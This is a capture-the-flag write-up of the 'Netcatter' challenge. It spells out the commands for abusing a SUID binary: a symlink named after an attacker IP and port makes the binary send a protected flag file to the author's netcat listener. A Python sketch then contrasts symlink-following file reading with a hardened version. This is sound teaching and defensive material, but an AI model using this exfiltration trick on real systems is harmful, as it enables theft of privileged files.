Guidepoint Security CTF 2021 - Netcatter (pwn)
For this challenge we get ssh access to a docker container as a regular user. We don’t really get any clues as to what we are looking for so we start by exploring the machine a little.
Under running processes we see the following process that stands out:
root 1 /bin/sh -c /etc/init.d/ssh start && while true; do ./netcatter files ; sleep 60; done
We do a `find` to see where this `netcatter` file is located and notice that it is a SUID binary owned by the user `target`. Let’s exfiltrate the binary so we can have a look at it on our local machine. The docker container has very few tools installed for this, so I ended up doing a `cat /opt/netcatter/netcatter | base64 -w 0` and copy-pasted the output to my local machine.
Throwing the binary into Ghidra we can pretty quickly find out a few things:
- It looks for files in the directory that you pass it as a parameter (that would be `files`, according to the process listing we saw earlier).
- It does something with string splitting on a `:` character on the filenames it finds in this directory.
- The string `/bin/nc.traditional` is in the binary.
Without fully reversing the binary we can already make a pretty good guess at what it is doing, so let’s test our theory. We run the binary in a VM, put a file named `127.0.0.1:9001` in the directory we pass to it, and start a netcat listener to see if we get a connection. Indeed we do, but no data is sent to us, and the binary does not appear to do anything with data we send back to it.
After putting some content in our test file we see that the content is simply sent over the socket. I put some shell script in there, but it did not appear to execute it, so there is no obvious path to code execution. Still, having file contents sent to us is possibly enough to solve the challenge in itself. Let’s go back to the target server and see what we can do with this.
Since the binary is run as the `target` user, we look for files owned by this user that may be of interest to us. Running `find / -user target` finds `/home/target/flag.txt`. Now all we need to do is set up a listening socket on our local system and do a `ln -s /home/target/flag.txt /opt/netcatter/files/10.10.0.25:9001` (10.10.0.25 is the IP address of our machine on the CTF VPN network). Our flag is neatly delivered to our netcat listener after a few seconds.
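To make the underlying weakness concrete, here is an added Python illustration (not the challenge binary's code, which was only partially reversed) of the file-reading step: the "vulnerable" reader follows symlinks the way the binary evidently does, while the hardened reader opens the name relative to the directory with `O_NOFOLLOW` and insists on a plain regular file. The directory layout, the flag content and the function names are constructed for this example.

```python
import os
import stat
import tempfile


def parse_target(filename):
    """Split a 'host:port' filename the way netcatter appears to; None if malformed."""
    host, sep, port = filename.rpartition(":")
    if not sep or not host or not port.isdigit():
        return None
    return host, int(port)


def read_payload_vulnerable(directory, name):
    """Plain open() follows symlinks, so a link dropped into the directory by an
    unprivileged user is read with the SUID user's privileges (the flag leak above)."""
    with open(os.path.join(directory, name), "rb") as f:
        return f.read()


def read_payload_hardened(directory, name):
    """Open relative to the directory, refuse symlinks (ELOOP under O_NOFOLLOW) and
    anything that is not a regular file with a single link (hard links to foreign
    files are normally blocked by fs.protected_hardlinks, but we check anyway)."""
    dir_fd = os.open(directory, os.O_RDONLY | os.O_DIRECTORY)
    try:
        try:
            fd = os.open(name, os.O_RDONLY | os.O_NOFOLLOW, dir_fd=dir_fd)
        except OSError as exc:
            raise PermissionError(f"refusing {name!r}: {exc.strerror}") from exc
        with os.fdopen(fd, "rb") as f:
            st = os.fstat(f.fileno())
            if not stat.S_ISREG(st.st_mode) or st.st_nlink != 1:
                raise PermissionError(f"refusing {name!r}: not a plain regular file")
            return f.read()
    finally:
        os.close(dir_fd)


def demo():
    """Constructed layout: a secret outside the drop directory, a symlink to it inside."""
    with tempfile.TemporaryDirectory() as tmp:
        secret = os.path.join(tmp, "flag.txt")
        with open(secret, "w") as f:
            f.write("FLAG{constructed}\n")
        drop = os.path.join(tmp, "files")
        os.mkdir(drop)
        os.symlink(secret, os.path.join(drop, "10.10.0.25:9001"))
        results = {}
        for name in os.listdir(drop):
            if parse_target(name) is None:
                continue  # the binary only acts on host:port names
            results["vulnerable"] = read_payload_vulnerable(drop, name)
            try:
                read_payload_hardened(drop, name)
                results["hardened"] = "read"
            except PermissionError:
                results["hardened"] = "refused"
        return results
```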